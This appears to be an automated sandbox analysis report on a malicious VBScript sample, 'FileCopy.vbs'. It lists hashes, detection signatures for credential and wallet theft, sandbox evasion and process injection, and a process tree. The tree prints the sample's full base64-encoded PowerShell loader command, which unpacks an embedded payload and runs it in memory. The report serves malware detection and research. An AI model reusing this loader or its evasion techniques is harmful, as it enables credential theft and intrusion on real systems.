Edit tour
Windows
Analysis Report
FileCopy.vbs
Overview
General Information
| Sample name: | FileCopy.vbs |
| Analysis ID: | 1564712 |
| MD5: | 2dfb7b7730d6c1728c756db5ec669f87 |
| SHA1: | 1c4892af68c0ee8ce4d73a16bbf3179f1bdff526 |
| SHA256: | 1720f6ba7249b11a24c319d496a66801896585a97498255bdf923ba29659aadc |
| Tags: | vbsuser-abuse_ch |
| Infos: |   |
 | |
Detection
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Creates processes via WMI
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Powershell is started from unusual location (likely to bypass HIPS)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 7280 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\FileC opy.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
cmd.exe (PID: 7356 cmdline: cmd /c cop y "C:\Wind ows\SysWOW 64\Windows PowerShell \v1.0\powe rshell.exe " "C:\User s\user\Des ktop\FileC opy.vbs.ex e" /Y MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7364 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
FileCopy.vbs.exe (PID: 7472 cmdline: "C:\Users\ user\Deskt op\FileCop y.vbs.exe" -enc JABJ AHYAaQBpAG IAcwBtAGYA aQBvACAAPQ AgAFsAUwB5 AHMAdABlAG 0ALgBEAGkA YQBnAG4Abw BzAHQAaQBj AHMALgBQAH IAbwBjAGUA cwBzAF0AOg A6AEcAZQB0 AEMAdQByAH IAZQBuAHQA UAByAG8AYw BlAHMAcwAo ACkALgBNAG EAaQBuAE0A bwBkAHUAbA BlAC4ARgBp AGwAZQBOAG EAbQBlAC4A UgBlAHAAbA BhAGMAZQAo ACcALgBlAH gAZQAnACwA JwAnACkAOw AkAEEAdAB0 AGsAdgB5AG cAIAA9ACAA ZwBlAHQALQ BjAG8AbgB0 AGUAbgB0AC AAJABJAHYA aQBpAGIAcw BtAGYAaQBv ACAAfAAgAF MAZQBsAGUA YwB0AC0ATw BiAGoAZQBj AHQAIAAtAE wAYQBzAHQA IAAxADsAIA AkAEMAaQB0 AGwAbQBnAG oAbgB0AGwA aQAgAD0AIA BbAFMAeQBz AHQAZQBtAC 4AQwBvAG4A dgBlAHIAdA BdADoAOgBG AHIAbwBtAE IAYQBzAGUA NgA0AFMAdA ByAGkAbgBn ACgAJABBAH QAdABrAHYA eQBnAC4AUg BlAHAAbABh AGMAZQAoAC cAUgBFAE0A IAAnACwAIA AnACcAKQAu AFIAZQBwAG wAYQBjAGUA KAAnAEAAJw AsACAAJwBB ACcAKQApAD sAJABSAHcA aQBuAHcAIA A9ACAATgBl AHcALQBPAG IAagBlAGMA dAAgAFMAeQ BzAHQAZQBt AC4ASQBPAC 4ATQBlAG0A bwByAHkAUw B0AHIAZQBh AG0AKAAgAC wAIAAkAEMA aQB0AGwAbQ BnAGoAbgB0 AGwAaQAgAC kAOwAkAFgA bwBmAHAAYQ BlAGwAbwBq ACAAPQAgAE 4AZQB3AC0A TwBiAGoAZQ BjAHQAIABT AHkAcwB0AG UAbQAuAEkA TwAuAE0AZQ BtAG8AcgB5 AFMAdAByAG UAYQBtADsA JABZAHgAbA B2AGYAZgBn ACAAPQAgAE 4AZQB3AC0A TwBiAGoAZQ BjAHQAIABT AHkAcwB0AG UAbQAuAEkA TwAuAEMAbw BtAHAAcgBl AHMAcwBpAG 8AbgAuAEcA egBpAHAAUw B0AHIAZQBh AG0AIAAkAF IAdwBpAG4A dwAsACAAKA BbAEkATwAu AEMAbwBtAH AAcgBlAHMA cwBpAG8Abg AuAEMAbwBt AHAAcgBlAH MAcwBpAG8A bgBNAG8AZA BlAF0AOgA6 AEQAZQBjAG 8AbQBwAHIA ZQBzAHMAKQ A7ACQAWQB4 AGwAdgBmAG YAZwAuAEMA bwBwAHkAVA BvACgAIAAk AFgAbwBmAH AAYQBlAGwA bwBqACAAKQ A7ACQAWQB4 AGwAdgBmAG YAZwAuAEMA bABvAHMAZQ AoACkAOwAk AFIAdwBpAG 4AdwAuAEMA bABvAHMAZQ AoACkAOwBb AGIAeQB0AG UAWwBdAF0A IAAkAEMAaQ B0AGwAbQBn AGoAbgB0AG wAaQAgAD0A IAAkAFgAbw BmAHAAYQBl AGwAbwBqAC 4AVABvAEEA cgByAGEAeQ AoACkAOwBb AEEAcgByAG EAeQBdADoA OgBSAGUAdg BlAHIAcwBl ACgAJABDAG kAdABsAG0A ZwBqAG4AdA BsAGkAKQA7 ACAAJABPAG MAaABpAHkA aAB3AGgAcw BtACAAPQAg AFsAUwB5AH MAdABlAG0A LgBBAHAAcA BEAG8AbQBh AGkAbgBdAD oAOgBDAHUA cgByAGUAbg B0AEQAbwBt AGEAaQBuAC 4ATABvAGEA ZAAoACQAQw BpAHQAbABt AGcAagBuAH QAbABpACkA OwAgACQATQ BxAGQAcgB0 AGsAbQBwAG YAbgB3ACAA PQAgACQATw BjAGgAaQB5 AGgAdwBoAH MAbQAuAEUA bgB0AHIAeQ BQAG8AaQBu AHQAOwAgAF sAUwB5AHMA dABlAG0ALg BEAGUAbABl AGcAYQB0AG UAXQA6ADoA QwByAGUAYQ B0AGUARABl AGwAZQBnAG EAdABlACgA WwBBAGMAdA BpAG8AbgBd ACwAIAAkAE 0AcQBkAHIA dABrAG0AcA BmAG4AdwAu AEQAZQBjAG wAYQByAGkA bgBnAFQAeQ BwAGUALAAg ACQATQBxAG QAcgB0AGsA bQBwAGYAbg B3AC4ATgBh AG0AZQApAC 4ARAB5AG4A YQBtAGkAYw BJAG4AdgBv AGsAZQAoAC kAIAB8ACAA TwB1AHQALQ BOAHUAbABs AA== MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 7480 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
InstallUtil.exe (PID: 7612 cmdline: "C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Ins tallUtil.e xe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
| JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
| JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
| JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
| Click to see the 8 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
| JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
| JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||